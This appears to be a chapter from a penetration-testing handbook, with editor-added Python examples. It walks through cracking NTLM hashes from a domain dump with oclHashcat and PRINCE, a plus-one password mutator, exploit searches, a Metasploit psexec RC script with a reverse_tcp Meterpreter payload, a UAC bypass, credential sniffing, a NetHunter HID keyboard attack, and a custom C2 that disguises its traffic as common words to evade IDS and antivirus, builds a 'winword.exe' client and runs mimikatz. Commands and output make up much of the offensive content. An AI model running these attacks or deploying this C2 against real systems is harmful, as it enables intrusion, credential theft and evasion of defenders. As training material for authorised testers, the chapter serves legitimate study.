[Screenshot: oclHashcat - Additional Password Lists. Session.Name oclHashcat; Status Exhausted; Rules.Type File (rules\InsidePro-HashManager.rule); Input.Mode File (lists\eNtr0pY_ALL_sort_uniq.dic); Hash.Target File (hashes\hashes.lst); Hash.Type NTLM; Time.Started Sat Jan 17 14:04:38 2015 (50 secs); Recovered 11682/21318 (54.80%) Digests, 0/1 (0.00%) Salts; Progress 538478030090/538478030090 (100.00%); Started Sat Jan 17 14:04:38 2015, Stopped Sat Jan 17 14:05:29 2015]





Back in the prep stages, we created some custom password lists using two tools, Wolfhound (for 
words from Twitter/Reddit/Websites) and the custom webscraping tool. Let's take those lists and run 
some additional cracks against them: 


• oclHashcat64.exe -m 1000 hashes\hashes.lst lists\10k_and_scraped_passwords.txt -r rules\InsidePro-PasswordsPro.rule --force


[Screenshot: oclHashcat - Custom Password Lists. INFO: approaching final keyspace, workload adjusted; Session.Name oclHashcat; Status Exhausted; Rules.Type File (rules\combinator.rule); Input.Mode File (lists\scraped_passwords.txt); Hash.Target File (hashes\hashes.lst); Hash.Type NTLM; Recovered 11790/21318 (55.31%) Digests, 0/1 (0.00%) Salts; Progress 200520/200520 (100.00%); Started Sat Jan 17 17:30:30 2015]





We now are at 55% of passwords cracked, but still have a long way to go. 


Prince: 

Prince is a password guess generator and can be thought of as an advanced Combinator attack. Rather than taking input from two different dictionaries and outputting all the possible two-word combinations, Prince has only one input dictionary and builds "chains" of combined words (http://reusablesec.blogspot.com/2014/12/tool-deep-dive-prince.html). Prince was introduced in late 2014 to advance password guessing attacks. As more and more people started using complex passwords, following the example set by this xkcd comic strip, http://xkcd.com/936/, it became harder to guess passwords.


What Prince does is take a password list and generates all the different combinations it can. If you 
have a list with: 

• a
• cat
• house


It will build a list of passwords:
• acat
• ahouse
• acathouse
• ahousecat
• cata
• cathouse
• catahouse
• cathousea
• ... and so on.


Using this technique, we can take some of our favorite password lists and generate great password 
combination lists. We will start with a small list of passwords, add our custom words and start 
building from there. In this case, I used the following password list, which had a good number of 
basic passwords: 


• https://raw.githubusercontent.com/discourse/discourse/master/lib/common passwor
common-passwords.txt


Next, I added the words scraped from the Bloodhound and Webscraper examples. In total, I have 
about 15,000 words to create these different password lists. For example: 


• princeprocessor-0.19\pp64.exe --pw-min=9 --pw-max=10 -o pp.txt < lists\10k_and_scraped_passwords.txt


Command Breakdown:
• princeprocessor Executable: pp64.exe
• --pw-min=9: Minimum password length of 9 characters
• --pw-max=10: Maximum password length of 10 characters
• -o pp.txt: Output to a file called pp.txt
• < lists\10k_and_scraped_passwords.txt: List of the 10k wordlist and scraped words
• *One additional optional flag is --elem-cnt-max=NUM. This defines how many words can be put together to make a chain.
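An added example (the editor's, not princeprocessor's code) that models what --pw-min, --pw-max and --elem-cnt-max do to the three-word list from the text, so the growth of the output can be predicted before writing gigabytes to disk. It enumerates chains exhaustively, which real PRINCE does not (it orders chains by probability and streams them), so it is only sensible for small inputs; prince_chains, chain_count_upper_bound and bytes_estimate are this example's own names.

```python
# Added example (editor's, not from the book): a small model of PRINCE
# chain building with the length and element-count limits from the text.
import itertools


def prince_chains(words, pw_min=1, pw_max=64, elem_cnt_max=8):
    """Yield each distinct chain of 1..elem_cnt_max words (the same word may
    repeat) whose joined length lies within [pw_min, pw_max]."""
    seen = set()
    shortest = min(len(w) for w in words)
    for n in range(1, elem_cnt_max + 1):
        if n * shortest > pw_max:          # no chain of n elements can fit
            break
        for combo in itertools.product(words, repeat=n):
            cand = "".join(combo)
            if pw_min <= len(cand) <= pw_max and cand not in seen:
                seen.add(cand)
                yield cand


def chain_count_upper_bound(n_words, elem_cnt_max):
    """Chains before length filtering: n_words + n_words^2 + ... This is why
    output size explodes with a bigger wordlist or a longer chain limit."""
    return sum(n_words ** k for k in range(1, elem_cnt_max + 1))


def bytes_estimate(chains):
    """Output size in bytes if every chain is written on its own line."""
    return sum(len(c) + 1 for c in chains)


if __name__ == "__main__":
    words = ["a", "cat", "house"]                     # the list from the text
    print(list(prince_chains(words, elem_cnt_max=3)))
    print("9-10 chars only:", list(prince_chains(words, 9, 10, 3)))
    print("upper bound for 15,000 words, chains of up to 2:",
          f"{chain_count_upper_bound(15000, 2):,}")
```

With the three words and chains of up to three elements, all 39 combinations are distinct (no word is a prefix of another); restricting to 9 or 10 characters leaves 8 of them. The upper bound function is the quick sanity check before running pp64.exe on 15,000 words: even two-element chains are over 225 million candidates before any length filtering.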


The output of pp.txt is about 272 MB. If we take a look at the files, we see the combined wordlists. 





[Screenshot: Prince - Password Generator. C:\Users\cheetz\Downloads\oclHashcat-1.32\pp.txt opened in Notepad++]


As we see from the pp.txt file above, there are words that we would never have had in our original 
password list. What if we create a file with passwords sized between 10-12 characters? 


• princeprocessor-0.19\pp64.exe --pw-min=10 --pw-max=12 -o pp10_12.txt < lists\10k_and_scraped_passwords.txt


The new file size is now 61GB. This shows that the file sizes grow exponentially and can get 
extremely large very quickly. What if we run the 10-12 character Prince-generated wordlist against 
our DC hash dump? 


• oclHashcat64.exe -m 1000 hashes\hashes.lst pp10_12.txt -r rules\InsidePro-HashManager.rule --force


[Screenshot: Prince - Password Cracking. Session.Name oclHashcat; Status Exhausted; Rules.Type File (rules\InsidePro-HashManager.rule); Input.Mode File (pp10_12.txt); Hash.Target File (hashes\hashes.lst); Hash.Type NTLM; Speed.GPU.#1 5342.5 MH/s, Speed.GPU.#2 4675.1 MH/s, Speed.GPU.#* 10017.6 MH/s; Recovered 11920/21318 (55.92%) Digests, 0/1 (0.00%) Salts; Started Sun Jan 18 11:10:04 2015, Stopped Sun Jan 18 11:53:08 2015]


The hash recovery went from 11790 to 11920 in 43 minutes. Although these aren't significant gains, these could be the passwords that we really care about. One interesting note is that on a lot of different pentests, I have noticed that users who have extremely long passwords usually have higher privileges. Usually, it is someone in the IT or security groups who has the most permissions.


The last example is that we can actually pipe the results from Prince processor straight into oclHashcat. Let's look for words between 13 and 14 characters and run the InsidePro-HashManager rule against those words.


• princeprocessor-0.19\pp64.exe --pw-min=13 --pw-max=14 < lists\10k_and_scraped_passwords.txt | oclHashcat64.exe -m 1000 hashes\hashes.lst -r rules\InsidePro-HashManager.rule --force


[Screenshot: Prince - Modifications. Rules.Type File (rules\InsidePro-HashManager.rule); Input.Mode Pipe; Hash.Target File (hashes\hashes.lst); Hash.Type NTLM; Time.Started Sun Jan 18 12:02:29 2015 (42 mins, 10 secs); Speed.GPU.#2 4987.3 MH/s; Recovered 56.08% of Digests, 0/1 (0.00%) Salts; Started Sun Jan 18 12:02:29 2015, Stopped Sun Jan 18 12:44:48 2015]





After about 40 minutes, we have gone past the 56% rate. So in the total of 2 hours, we have cracked 
about 12,000 out of the 21,000 password hashes using all open source and readily available 
information. Taking it to the next step would be to focus on the targeted employees, pull additional 
password dumps, and lastly start brute forcing. 


C:\oclHashcat-1.32>.\hashcat-utils-1.1\morph.exe lists\crackstat_realhuman_phill.txt 20 3 3 12 > testrule.txt


C:\oclHashcat-1.32>oclHashcat64.exe -m 1000 hashes\hashes.lst lists\crackstat_realhuman_phill.txt -r testrule.txt --force


[Screenshot: Morph Example. Session.Name oclHashcat; Status Exhausted; Rules.Type File (testrule.txt); Input.Mode File (lists\crackstat_realhuman_phill.txt); Hash.Target File (hashes\hashes.lst); Hash.Type NTLM; Time.Started Mon Feb 02 21:07:17 2015 (5 secs); Speed.GPU.#1 3839.3 MH/s, Speed.GPU.#2 3769.6 MH/s, Speed.GPU.#* 7608.9 MH/s; Recovered 12237/21318 (57.40%) Digests, 0/1 (0.00%) Salts; Progress 36156827385/36156827385 (100.00%); Started Mon Feb 02 21:07:17 2015, Stopped Mon Feb 02 21:07:24 2015]


Now, we are going to go against the large crackstation password list. 


• oclHashcat64.exe -m 1000 hashes\hashes.lst \Users\cheetz\Desktop\Kali_Share\realuniq.lst -r rules\rockyou-30000.rule --force


[Screenshot: oclHashcat - Results. INFO: approaching final keyspace, workload adjusted; Session.Name oclHashcat; Status Exhausted; Rules.Type File (rules\rockyou-30000.rule); Input.Mode File (\Users\cheetz\Desktop\Kali_Share\realuniq.lst); Hash.Target File (hashes\hashes.lst); Hash.Type NTLM; Time.Started Mon Feb 02 23:19:59 2015 (453 mins); Speed.GPU.#2 2366.3 kH/s, Speed.GPU.#* 2366.3 kH/s; Recovered 14275/21318 (66.96%) Digests, 0/1 (0.00%) Salts; Progress 100.00%; Started Mon Feb 02 23:19:55 2015, Stopped Tue Feb 03 2015]


After about four hours of cracking, we are almost at 70%. This is just a start on how I approach 
password cracking. Usually, I will go after more custom passwords and try more complex rules to get 
to that 90%+. 


Retesting Passwords: What if after a test, they change all their passwords? What if we increment 
their old password by a value of 1? 

• oclHashcat64.exe -m 1000 hashes\hashes.lst --show > password_list.txt 
• type password_list.txt 
• test1:509019:aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e 
• test3:498809:aad3b435b51404eeaad3b435b51404ee:523971d356ffcaaa96cfb6959 
• test4:496638:aad3b435b51404eeaad3b435b51404ee:4636190bde3bb52ad2d29ca3 
• test5:520315:aad3b435b51404eeaad3b435b51404ee:b8ffa37b7c490aaf0e5661fad3 





There have been penetration tests where I compromised a domain and was successful in 
pulling/cracking hashes. The client patched all the findings, reset all the passwords of those users, 
and asked for a remediation test. 


After testing and validating that everything was fixed, I took it one step further. I wanted to make sure 
that the users didn’t just change their password by incrementing by one. We have seen a ton of 
password breaches and leaks in the past and we want to make sure that users are smarter than just 
incrementing by a single number. 


I have developed Password Plus One, which takes the output from oclHashcat and, regardless of special 
characters, increases the last integer by one. For example, if the password is 1<3turtles09, the new 
password generated is 1<3turtles10. 


If we take our last output and we read the hashes, it will look something like: 
root@kali:/opt/Password_Plus_One# cat /mnt/hgfs/oclHashcat-1.32/password_list.txt 

• jsmith:1::64f12cddaa88057e06a81b54e73b949b::::Password1 
• plee:2::f9671733342b19ec0753bd34892cc4c3::::Nina2014 
• ssmith:3::176b4c6fbb0a54cd5a693b57fe887465::::1<3turtles09 
• jwatts:5::9f00b7969b887b7e21a736c09328d083::::TodayisToday 
• bjones:6::d3b4e97bb637cd629ef5b9f5d7bd5064::::Toneth2$ 


We want to run Password Plus One on our large password list: 

• cd /opt/Password_Plus_One 
• python ./password_plus_one.py 
  o Enter the location of the oclHashcat output 
  o A new file will be created with a list of Usernames/New Passwords in new_password_list.txt 
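As an added illustration (not the author's Password_Plus_One script), the following Python reproduces the increment rule described above and applies it to `--show` lines in the layout shown, so a remediation test can check whether a user's new password is just the old one plus one. The handling of passwords with no digits, the line parsing, and the sample lines are my assumptions.

```python
import re

# Last run of digits in the string: greedy digits with no digit anywhere after.
_LAST_DIGITS = re.compile(r"(\d+)(?!.*\d)")


def plus_one(password: str) -> str:
    """Increase the last integer in a password by one, ignoring any special
    characters around it and keeping the original digit width
    (1<3turtles09 -> 1<3turtles10, Toneth2$ -> Toneth3$, Nina2014 -> Nina2015).
    Assumption: a password with no digits at all gets a '1' appended."""
    m = _LAST_DIGITS.search(password)
    if m is None:
        return password + "1"
    digits = m.group(1)
    bumped = str(int(digits) + 1).zfill(len(digits))  # 09 -> 10, 99 -> 100
    return password[:m.start()] + bumped + password[m.end():]


def parse_show_line(line: str):
    """Split one `oclHashcat --show` line in the pwdump-style layout shown on
    the page, user:id:LM:NT::::plaintext, into (user, plaintext).
    Assumption: the first seven ':' separate fields, so a plaintext that itself
    contains ':' survives intact. Returns None for blank or malformed lines."""
    parts = line.rstrip("\r\n").split(":", 7)
    if len(parts) < 8 or not parts[0]:
        return None
    return parts[0], parts[7]


def generate_candidates(show_output: str):
    """Turn cracked (user, password) pairs into (user, password + 1) pairs,
    the list the page feeds to a remediation test."""
    out = []
    for line in show_output.splitlines():
        parsed = parse_show_line(line)
        if parsed:
            user, pw = parsed
            out.append((user, plus_one(pw)))
    return out


def is_trivial_increment(old: str, new: str) -> bool:
    """Remediation check: did the user just add one to the old password?"""
    return new == plus_one(old)


# Constructed sample in the same layout as the page's password_list.txt
# (the hash fields are placeholders, not real NT hashes).
SAMPLE_SHOW = """\
jsmith:1::<nt-hash-placeholder>::::Password1
plee:2::<nt-hash-placeholder>::::Nina2014
ssmith:3::<nt-hash-placeholder>::::1<3turtles09
jwatts:5::<nt-hash-placeholder>::::TodayisToday
bjones:6::<nt-hash-placeholder>::::Toneth2$
"""

if __name__ == "__main__":
    for user, candidate in generate_candidates(SAMPLE_SHOW):
        print(f"{user}:{candidate}")
```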


[Screenshot: running password_plus_one.py; the script reads the oclHashcat output and increments the last number in each password]
P+1 - Password Modification





Now, you can feed this into a bruteforcer for web applications, SSH, or even Outlook Web 
Application (OWA). On decent-sized clients, this attack usually leads back into multiple accounts and 
into the company. 


Vulnerability Searching 


A huge part of being a pentester is being able to find vulnerabilities in applications and services. 
From the Nmap scans, vulnerability scans, and from poking around, you will identify all sorts of 
versions of these applications and services. 


Generally, I will take the results from Nmap banners and the vulnerability scanner and query the 
identified versions of the applications against the following sites/tools to find exploits: 


Searchsploit (Kali Linux) 


Searchsploit is a default query tool that will search through publicly known exploits based on a 
search string you provide. You can provide part of the title or application to find an exploit. There 
are a good number of exploits here and most of them have code or scripts ready to run. One thing I 
want to strongly urge is to make sure that you test them in a lab environment before testing them on 
production systems. 


On your Kali host, run searchsploit. 





Searchsploit 


For this example, let's say I found a Joomla site and I want to see if there are any vulnerabilities for 
this application. To query searchsploit, I will craft a query like: 
searchsploit joomla. 


[Screenshot: searchsploit joomla results, including "Joomla Kunena Component (index.php) SQL Injection - php/webapps/22153.pl", "Joomla JooProperty 1.13.0 Multiple Vulnerabilities", "Joomla! <= 3.0.2 (highlight.php) PHP Object Injection", "Joomla RSfiles Component (cid param) - SQL Injection", "CiviCRM for Joomla 4.2.2 - Remote Code Injection" and "Joomla DJ Classifieds Extension 2.0 - Blind SQL Injection"]
Searchsploit Results





Just from a quick query for Joomla, we currently have 906 different vulnerabilities. Let's take a look 
at one of them to get an idea of what it looks like. One thing to note is that the paths in the results are 
pathed improperly. All searchsploit files are located under /usr/share/exploitdb/. To view the 
vulnerability or exploit code, type the following: 
cat /usr/share/exploitdb/platforms/php/webapps/22153.pl 


[Screenshot: contents of /usr/share/exploitdb/platforms/php/webapps/22153.pl, headed "Joomla Component com_kunena SQL Injection", "Coded by D35m0nd142"]
22153 Perl Joomla Exploit Example


22153.pl is a Perl script that performs an SQL injection against a certain version of Joomla. If 
successful, the script returns the administrator's password. 


Bugtraq 


(http://www.securityfocus.com/bid) 


Security Focus’s BugTraq is an excellent source for finding vulnerabilities and exploits. You can 
search vulnerabilities by CVEs or by vendor/product types at: http://www.securityfocus.com/bid. 


In the example below, I was looking for some Adobe ColdFusion exploits and seemed to have found 
quite a few. 


[Screenshot: www.securityfocus.com/bid vulnerability search (Vendor: Adobe, Title: ColdFusion, Version: Select Version, Search by CVE) with results including:
Adobe ColdFusion CVE-2010-5290 Authentication Bypass Vulnerability, 2013-09-20, http://www.securityfocus.com/bid/62695
Adobe ColdFusion CVE-2013-0632 Authentication Bypass Vulnerability, 2013-08-20, http://www.securityfocus.com/bid/57330
Adobe ColdFusion CVE-2013-3349 Remote Denial of Service Vulnerability, 2013-07-09]
BugTraq


Exploit-db 
(http://www.exploit-db.com/) 


This site has definitely grown and I really see this site as the replacement of the good ol' milw0rm. 
Many researchers will post their exploits and research to Exploit-DB, which is completely 
searchable. I recommend that you spend some time on Exploit-DB as it is a great resource. 


[Screenshot: exploit-db.com front page listing recent Remote Exploits, Local Exploits and Web Applications entries by date (October 2013)]
Exploit-DB


Querying Metasploit 


You can't forget Metasploit as a great resource for finding vulnerabilities. 
• On your Kali host, in a terminal type: msfconsole 
• And to find an exploit or auxiliary module, type: search [what you want to find] 


In the following example, I search for all ColdFusion modules. 





Search Metasploit 


Tips and Tricks 


This section is dedicated to things that didn't really have a place in the other sections, but might be 
able to make your job much easier. 


RC Scripts Within Metasploit 


Since I try to encourage efficiency, some scripts that you should look into are Metasploit's resource 
(RC) scripts. These scripts can be created to help speed up common tasks you might perform. For this 
example, I am creating a script to use the PSExec module, use smart_migrate to migrate the 
Meterpreter process into another PID, and fill in all the other information required for the attack. 


We will save the following code to demo.rc: 
• use exploit/windows/smb/psexec 
• set rhost 192.168.10.10 
• set smbuser Administrator 
• set smbpass [hash or password] 
• set smbdomain [domain] 
• set payload windows/meterpreter/reverse_tcp 
• set AutoRunScript post/windows/manage/smart_migrate 
• setg lport 443 
• setg lhost 192.168.10.3 





To run the script, from a shell prompt enter: 
• msfconsole -r /root/demo.rc 





RC Scripts 


All you have to do after it loads is type: exploit. This script starts up Metasploit, authenticates to 
192.168.10.10 using PSExec, drops and executes the Meterpreter payload, and connects that box back 
to your host to gain a full Meterpreter shell. 


This is a much faster way to prepare your scripts, exploits, and especially handlers. I like to add 
features like auto-migrate or add custom payloads to exploits. 


Windows Sniffer 


There may be times when you need to start a sniffer on the host system. This can be done on 
any Win7 or higher OS with Administrative Privileges, without any additional software. {47} {48} 

• netsh trace start capture=yes overwrite=no tracefile=C:\Users\Public\sniff.etl 
• netsh trace stop 


To convert the etl file to something we can view in Wireshark (.cap file), we have to do the 
following: 


• On Win 8, first install Message Analyzer: 
  o 
• Run the command: 
  o powershell -exec bypass -command "import-module PEF; $s = New-PefTraceSession -Path 'C:\Users\Public\OutFile.Cap' -SaveOnStop; $s | Add-PefMessageProvider -Provider 'C:\Users\Public\sniff.etl'; $s | Start-PefTraceSession" 


The output will be located in C:\Users\Public\OutFile.Cap, and you can open this file directly in 
Wireshark. Remember that by default, it only captures 250MB, so if you need more space, specify the 
MaxSize=<Size> switch. 


So, what do you do after you capture a lot of different network traffic? You need to parse through it. 
We are going to use a tool called net-creds developed by Dan McInerney. Net-creds is a tool that 
sniffs passwords and hashes from a pcap file. It will include URLs, username/passwords in cleartext, 
SNMP, SMTP, NTLM, and Kerberos. Since this tool only takes in pcap files, it is important to first 
convert your cap file to a pcap file. I usually do this by loading the cap file into Wireshark and saving 
it back as a pcap. Once we have a pcap file, we can run the following commands: 

• cd /opt/net-creds 
• python net-creds.py -p [pcap file] 


root@kali:/opt/net-creds# python net-creds.py -p OutFile.pcap 

[192.168.1.85] GET next-services.apps.microsoft.com/ 

[192.168.1.85:49764 > 192.168.210.76:21] FTP User: hacker 

[192.168.1.85:49764 > 192.168.210.76:21] FTP Pass: password 

[192.168.210.76:21 > 192.168.1.85:49764] Authentication: authentication successful 
[192.168.1.85:51234 > 192.168.210.76:445] NETNTLMv2: lab::hacker.testlab: 11223344... 


Bypass UAC 


There are times when you might have an administrative account and a Meterpreter session, but you 
can't become system by using the "getsystem" command. This is most likely because User Account 
Control (UAC) protection is blocking you from running the getsystem command. 


In the past and in the previous book, we used either a custom upload of bypassUAC from David 
Kennedy or used the metasploit module bypassuac. The issue was that it had to drop an executable, 
which would generally spawn a second file as well. I have often seen instances where AV would 
pick up either one of the two files. 


To get around this, I migrated from using bypassuac to using bypassuac_injection. This module uses 
the Reflective DLL Injection technique to drop only the DLL payload binary instead of the three 
separate binaries in the standard technique. The reason I switched is because I have had better luck 
evading AV using a DLL versus executables. If you need to use a custom DLL, you can always set 
EXE::Custom to your DLL. Let's walk through an example where you need to get to system quickly. 


You might see something like this: 


• msf exploit(bypassuac_injection) > sessions -i 1 
• [*] Starting interaction with 1... 
• meterpreter > getsystem 
• [-] priv_elevate_getsystem: Operation failed: The environment is incorrect. 


If you do have an administrative account, most likely UAC is blocking execution, which is enabled by 
default. To get around this, you will need to background the current Meterpreter process, use the 
bypassuac_injection module, set your options, and run it: 

• meterpreter > background 
• [*] Backgrounding session 1... 
• msf exploit(bypassuac_injection) > use exploit/windows/local/bypassuac_injection 
• msf exploit(bypassuac_injection) > set target 1 
• target => 1 
• msf exploit(bypassuac_injection) > set PAYLOAD windows/x64/meterpreter/reverse_https 
• PAYLOAD => windows/x64/meterpreter/reverse_https 
• msf exploit(bypassuac_injection) > exploit 


Note that if you are targeting an x64 host, you need to make sure to set the PAYLOAD to a 64-bit 
payload and set the target to “1”, which is the Windows 64-bit OS target. 


[Screenshot: bypassuac_injection run: HTTPS reverse handler started, UAC is enabled, stage sent to the target and received, then "Starting interaction with 2..." in the new session]
BypassUAC


Now, you can do hashdumps, mimikatz, or any other command that requires system privileges. 


Kali Linux Nethunter 


Every so often, I need to do a little penetration testing on the go. A great portable solution for this is 
Kali Linux NetHunter. 


“The Kali Linux NetHunter project is the first Open Source Android penetration testing platform for 
Nexus devices, created as a joint effort between the Kali community member “BinkyBear” and 
Offensive Security. NetHunter supports Wireless 802.11 frame injection, one-click MANA Evil 
Access Point setups, HID keyboard (Teensy-like attacks), as well as BadUSB MITM attacks.” {49} 


Out of the box, NetHunter works pretty easily with Nexus 5, Nexus 7, or Nexus 10. To install, 
download the NetHunter Installer from: 


https://www.offensive-security.com/kali-linux-nethunter-download/ 


Run the executable, and follow the install instructions. 





[Screenshot: NetHunter Installer v1.1.6 by Offensive Security. Step #1 - Device Selection (Nexus 7 2013 Edition Wi-Fi Tablet selected); Step #4 - Download Files, showing the download status of Kali Linux NetHunter, Modified Bootimg, TWRP Recovery, Chainfire SuperSU (SuperSU-v2.40.zip) and the Factory Package]
Installing NetHunter


Installation is pretty straightforward and once you have it all configured, NetHunter is ready to go. 
Going to the tablet, you will be brought to the screen below. To start using NetHunter, drop into the 
NetHunter App. 


[Screenshot: NetHunter start screen with the Kali Launcher widgets: Launch Kali Shell in Terminal, Launch Kali Menu in Terminal, Launch Wifite, Update Kali chroot]
Nethunter Start Screen


If we drop into the “Launch Kali Shell in Terminal” we can type “msfconsole” and drop straight into 
Metasploit. NetHunter has a lot of abilities, such as attacking WIFI networks, setting up access points, 
malicious DNS servers, and more. 


[Screenshot: msfconsole running inside the NetHunter Kali shell on the tablet]
Nethunter - Metasploit


One of the attacks is similar to the Rubber Ducky attack. This attack is called the “HID Keyboard 
Attack” and allows the Nexus device to emulate a keyboard and press keystrokes onto the machine 
once it is plugged into a computer. To access the HID tool, on the top-left menu, we can drop to “HID 
Keyboard Attack.” 


[Screenshot: NetHunter Android app with the HID Keyboard Attack screen open. The left menu lists NetHunter Home, Kali Service Control, HID Keyboard Attack, BadUSB MITM Attack, MANA Evil Access Point, Dnsmasq Service and Iptables Configuration; the attack screen offers Windows CMD UAC Bypass, Keyboard Layout, Execute Attack and Reset USB, plus a command box holding the demo commands (ipconfig, net user /add, net localgroup administrators /add)]
Nethunter HID Attack


You might have to configure the UAC Bypass and, once the device is plugged into a computer, just hit 
execute. The great part about this tool is that it is flexible, easy to configure, and quick to use. You 
might be on a physical engagement, where you are walking around the office. You see someone leave 
their workstation unlocked to leave for lunch. You don’t want to be sitting there typing commands on 
their machine. Instead, you might be able to plug your NetHunter device into a USB port and hit 
execute. You wait as it calls a PowerShell Meterpreter script and creates a reverse shell. Another use 
for something like the HID Keyboard Attack is with kiosks. I have seen plenty of kiosks that either 
have a limited physical/virtual keyboard, or no keyboard at all, but have USB ports. This is a great 
attack for just that. 


Building A Custom Reverse Shell 


I did a presentation at one of the LETHAL meetings about problems we sometimes encounter on 
engagements. As we run into more and more complex firewalls, we need to look at things differently. 
One thing I started seeing is application-based firewalls. The idea behind this is that the firewall 
looks at the packets to see if they are communicating the proper protocols on the proper ports. So, you 
can’t run SSH on web ports (80/443) and the company does full “man in the middle” SSL proxying. 
Therefore, not only do we need to look like the protocols that are specific to those ports, but we also need 
to evade any sort of IDS. When I teach, I love to give the doomsday scenario. Let’s say Metasploit no 
longer works, you have full SSL interception, and the IDS works great. What can you do? 


I started building a framework exactly for this. What were my requirements? 
• Bypass application-based firewalls 
• Make everything seem normal to an analyst 
• Be able to have full control of the host 
• Be able to upload/download files 
• Make penetration testing faster 
• Generate client executables and evade AV 


I built and implemented the communication protocol first. From there, I can build all the modules. The 
implementation targeted the following: 
• Take the Top 500 Words 
• Any C2 communication between client and server: 
  o Gets gzip compressed 
  o Gets base64 encoded for standard characters 
  o Each letter is converted to a word 
• Make sure traffic looks random: 
  o The same cmd command doesn't look the same (cmd != cmd) 
  o Can't build standard IDS signatures 
• Utilize system commands (PowerShell, WMI) 
• Python/pyinstaller 


Let's walk through an example. Let's say we want to send a “cmd ipconfig” command to get the IP of 
the host: 


[Figure: client-side encoding of the "cmd ipconfig" command]
• Command: cmd ipconfig (no change) 
• Gzip compress result: the compressed bytes (shown on the page as an escaped byte string beginning x\x9cK...) 
• Base64 encode result: eJxLzk1RyCxIzs9LyOwHABIfBKQ 
• Random key generation (1-500): 20 

Now that we have a base64 encoded string (eJxLzk1RyCxIzs9LyOwHABIfBKQ) and a key of 20, we 
can generate obfuscated packets: 
• Take the key (20) against the Top 500 Words list and uppercase the first letter 
• Take the first letter from the base64 string (e) and add it to the key: current counter = 20 (key) + 5 (e is the 5th letter of the alphabet) = 25 
• Find the 25th word in the Top 500 Words list 
• Continue for every letter in the base64 string 
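Added example, not code from the author's c2 project: a toy implementation of the word-cover pipeline just described (gzip, base64, one dictionary word per symbol, shifted by a per-message key) together with the matching decoder an analyst who has the word list can use to recover what a captured stream carried, plus the simple dictionary-ratio check that answers "how do you detect this?". The 99-word list is constructed (the real tool uses the top 500); using the base64 alphabet position as the per-symbol value and carrying the key as the capitalised first word are my assumptions about details the walk-through leaves open.

```python
import base64
import gzip
import string

# Constructed stand-in for the "Top 500 Words" list (99 common words, no
# repeats). Any list works as long as it is larger than the symbol alphabet.
WORDS = """the of and a to in is you that it he was for on are as with his they
at be this have from or one had by word but not what all were we when your
can said there use an each which she do how their if will up other about out
many then them these so some her would make like him into time has look two
more write go see number no way could people my than first water been call
who oil its now find long down day did get come made may part""".split()

# Per-symbol value: position in the base64 alphabet (the page's "e is the
# 5th letter" becomes index 30 here; an assumption, not the tool's table).
# '=' padding gets the last slot.
SYMBOLS = string.ascii_uppercase + string.ascii_lowercase + string.digits + "+/="


def encode(command: str, key: int) -> str:
    """cmd -> gzip -> base64 -> words. The key shifts every lookup, so the
    same command yields different words on every send."""
    n = len(WORDS)
    if not (1 <= key < n) or len(set(WORDS)) != n or n <= len(SYMBOLS):
        raise ValueError("bad key or word list")
    b64 = base64.b64encode(gzip.compress(command.encode(), mtime=0)).decode()
    # Assumption: the key travels as the key-th word with its first letter
    # upper-cased, which is what tells the receiver the offset.
    tokens = [WORDS[key].capitalize()]
    tokens += [WORDS[(key + SYMBOLS.index(ch)) % n] for ch in b64]
    return " ".join(tokens)


def decode(text: str) -> str:
    """Inverse of encode(): recover the key from the capitalised word, undo
    the shift, then base64-decode and gunzip."""
    n = len(WORDS)
    first, *rest = text.split()
    key = WORDS.index(first.lower())
    b64 = "".join(SYMBOLS[(WORDS.index(w) - key) % n] for w in rest)
    return gzip.decompress(base64.b64decode(b64)).decode()


def cover_ratio(text: str) -> float:
    """Detection hint: share of tokens drawn from the word list. Genuine
    request bodies rarely consist purely of top-frequency words in random
    order, so a ratio of 1.0 over a long body is worth a second look."""
    tokens = text.lower().split()
    return sum(t in WORDS for t in tokens) / len(tokens) if tokens else 0.0


if __name__ == "__main__":
    body = encode("cmd ipconfig", 20)
    print(body)
    print(decode(body), cover_ratio(body))
```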





Server Implementation: 

The other requirement was to bypass application-based firewalls. To do this, we need to not only 
communicate over a web port, but we need it to look like web traffic. 

[Figure: client/server exchange]
• Request: POST Hello Request -> Response: dog cat woof... (the victim sends Hello and the server responds with "run ipconfig") 
• The client processes ipconfig and sends POST: Where am forever tomorrow... -> Response: (Empty) (the victim processes ipconfig, sends the result to the server, and the server sends nothing back) 
• Request: POST Hello Request (the victim keeps sending Hello pings until a command is given) 





Now that we have an understanding of how the clients will communicate to our server, let’s walk 
through the Proof of Concept (PoC). First install the c2 code and create a malicious binary. Note: make 
sure to have SMBExec and Veil-Framework installed, as these tools will install all the dependencies. 


• git clone https://github.com/cheetz/c2 /opt/c2/ 
• cd /opt/c2/ 
• chmod +x setup.sh 
• ./setup.sh 
• python ./server.py 
• help 
• generate binary [ip] [port] 





[Screenshot: server.py started; "help" prints the command summary (sessions, info [host], cmd [host], kill, pwn, sleep, post [host] [command], generate binary [ip] [port], exit); "generate binary 172.16.151.128 80" then runs pyinstaller under wine and logs the build]
Custom C2 - Building a Payload





We have generated a binary and it is saved to /opt/c2/dist/winword.exe. This is a python file turned 
into an executable that will communicate back to our server. We can now take that executable and 
move it to our victim system and run it. 


Once a victim has executed the client, you will see the hostname show up on the C2 server. We can 
run a quick help to see what we can do. One example is the info [host] command. If we run info win7, 
we see all the host information, such as user and system info, permissions, network information, 
netstat, and open shares. 


[Screenshot: pyinstaller finishes writing /opt/c2/dist/winword.exe; the client checks in ("win7:Connectedv2 win7"); "info win7" returns USER INFORMATION (hacker\testuser1 and its SID) and GROUP INFORMATION (e.g. BUILTIN\Users)]
Custom C2 - Post Exploitation





I also incorporated a ton of the standard post-exploitation commands. Although Metasploit and 
Meterpreter are amazing tools, sometimes it is hard to know exactly what to do next. That is why I 
created the post section specifically for Windows. It will do all the standard Windows post-exploitation 
tasks, such as listing patches, listing users, listing all accounts in Active Directory, pulling passwords 
with Mimikatz, bypassUAC, and popcreds. Just type “post” on the server and interact with: 

• post win7 password64 
• This will execute mimikatz on the end host and pull hashes. 


[Screenshot: "post" prints the post-exploitation command list (ad users, password, password64, get_computer details, netview, win patches, list processes, list users, downloadfile [file] [location], bypassuac32, bypassuac, pop creds, calc); "post win7 password64" runs mimikatz 2.0 alpha (x64) sekurlsa::logonpasswords and returns the NTLM hash for HACKER\testuser1]
Custom C2 - BypassUAC and Mimikatz





You also have the ability to run commands on the end host with cmd [hostname] “command”. More 
important than running these commands is the question: “What does the traffic look like?” Next, let’s look in 
Wireshark to view the TCP stream when we pull hashes in the next example. 


